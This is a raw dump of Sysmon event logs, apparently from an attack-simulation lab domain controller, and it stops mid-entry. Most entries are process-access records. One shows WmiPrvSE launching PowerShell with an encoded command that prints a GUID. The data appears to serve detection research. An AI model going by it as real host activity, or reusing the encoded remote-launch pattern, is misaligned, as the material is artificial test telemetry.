16:53:44.171{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-229D-6039-0900-00000000AD01}792C:\Windows\system32\winlogon.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 23542300x80000000000000002238333Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:44.154{05ADC7E1-6D98-603E-93AA-00000000AD01}13748ATTACKRANGE\AdministratorC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Temp\__PSScriptPolicyTest_zi43mxeq.0lh.psm1MD5=D17FE0A3F47BE24A6453E9EF58C94641,SHA256=96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002238332Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:44.154{05ADC7E1-6D98-603E-93AA-00000000AD01}13748ATTACKRANGE\AdministratorC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Temp\__PSScriptPolicyTest_12tfnkng.gpf.ps1MD5=D17FE0A3F47BE24A6453E9EF58C94641,SHA256=96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000002238331Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:44.154{05ADC7E1-29F0-6039-C005-00000000AD01}49441064C:\Windows\system32\csrss.exe{05ADC7E1-6D98-603E-96AA-00000000AD01}6924C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x80000000000000002238330Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:44.154{05ADC7E1-29F0-6039-C005-00000000AD01}49443952C:\Windows\system32\csrss.exe{05ADC7E1-6D98-603E-95AA-00000000AD01}6528C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x80000000000000002238329Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:44.154{05ADC7E1-229F-6039-0C00-00000000AD01}5888240C:\Windows\system32\svchost.exe{05ADC7E1-22AF-6039-2800-00000000AD01}1936C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002238328Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:44.154{05ADC7E1-229F-6039-0C00-00000000AD01}5888240C:\Windows\system32\svchost.exe{05ADC7E1-22AF-6039-2800-00000000AD01}1936C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002238327Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:44.154{05ADC7E1-229F-6039-0C00-00000000AD01}5888240C:\Windows\system32\svchost.exe{05ADC7E1-22AF-6039-2800-00000000AD01}1936C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002238326Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:44.154{05ADC7E1-229F-6039-0C00-00000000AD01}5888240C:\Windows\system32\svchost.exe{05ADC7E1-22AF-6039-2800-00000000AD01}1936C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002238325Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:44.154{05ADC7E1-229D-6039-0500-00000000AD01}636652C:\Windows\system32\csrss.exe{05ADC7E1-6D98-603E-95AA-00000000AD01}6528C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x80000000000000002238324Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:44.154{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-6D98-603E-95AA-00000000AD01}6528C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7354|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6f453|C:\Windows\System32\KERNEL32.DLL+1d37f|C:\Windows\system32\wbem\cimwin32.dll+3adce|C:\Windows\system32\wbem\cimwin32.dll+3d475|C:\Windows\system32\wbem\cimwin32.dll+3ab15|C:\Windows\system32\wbem\cimwin32.dll+3b393|C:\Windows\system32\wbem\cimwin32.dll+3bb40|C:\Windows\SYSTEM32\framedynos.dll+20256|C:\Windows\SYSTEM32\framedynos.dll+218b5|C:\Windows\system32\wbem\wmiprvse.exe+1704a|C:\Windows\system32\wbem\wmiprvse.exe+1724f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4 154100x80000000000000002238323Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:44.156{05ADC7E1-6D98-603E-95AA-00000000AD01}6528C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe10.0.14393.206 (rs1_release.160915-0644)Windows PowerShellMicrosoft® Windows® Operating SystemMicrosoft CorporationPowerShell.EXEpowershell.exe /NoProfile /En VwByAGkAdABlAC0ASABvAHMAdAAgADMAZQA0ADgANwAxADEAZAAtADkAYQAwADIALQA0ADEAOQAwAC0AYQA1AGEANQAtAGQAZgBjAGQAYwBkADUAMABkADgAZgA0AA==C:\Windows\system32\ATTACKRANGE\Administrator{05ADC7E1-29F1-6039-B11D-350000000000}0x351db12HighMD5=097CE5761C89434367598B34FE32893B,SHA256=BA4038FD20E474C047BE8AAD5BFACDB1BFC1DDBE12F803F473B7918D8D819436,IMPHASH=CAEE994F79D85E47C06E5FA9CDEAE453{05ADC7E1-6D63-603E-6BAA-00000000AD01}6344C:\Windows\System32\wbem\WmiPrvSE.exeC:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding 10341000x80000000000000002238322Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:44.138{05ADC7E1-229F-6039-1600-00000000AD01}15401672C:\Windows\system32\svchost.exe{05ADC7E1-6D97-603E-91AA-00000000AD01}16200C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d99|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002238321Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:44.138{05ADC7E1-229F-6039-1600-00000000AD01}15401572C:\Windows\system32\svchost.exe{05ADC7E1-6D97-603E-91AA-00000000AD01}16200C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6084|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 11241100x80000000000000002238320Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:44.138{05ADC7E1-6D98-603E-93AA-00000000AD01}13748C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Temp\__PSScriptPolicyTest_12tfnkng.gpf.ps12021-03-02 16:53:44.138 23542300x80000000000000002238319Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:44.138{05ADC7E1-FB2E-603C-9079-00000000AD01}4328NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=1054AB3DA232BE02D27D2F8C60FB317A,SHA256=76D9C7EBCF07B2A879246C137F7C6A8F4675B46E5A4B3BD72BD86D85E024E081,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000002238318Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:44.123{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-6D98-603E-94AA-00000000AD01}15412C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002238317Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:44.123{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-6D98-603E-93AA-00000000AD01}13748C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002238316Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:44.123{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-6D97-603E-92AA-00000000AD01}11928C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002238315Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:44.123{05ADC7E1-229F-6039-0C00-00000000AD01}5888240C:\Windows\system32\svchost.exe{05ADC7E1-6D98-603E-93AA-00000000AD01}13748C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002238314Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:44.123{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-6D97-603E-91AA-00000000AD01}16200C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002238313Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:44.123{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-6CB1-603E-35AA-00000000AD01}14828C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002238312Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:44.123{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-6CB1-603E-34AA-00000000AD01}11696C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002238311Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:44.123{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-6CAF-603E-33AA-00000000AD01}8188C:\Windows\system32\DllHost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002238310Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:44.123{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-64FC-603E-3AA9-00000000AD01}15352C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002238309Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:44.123{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-64C0-603E-31A9-00000000AD01}7648C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002238308Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:44.123{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-6394-603E-0CA9-00000000AD01}10840C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\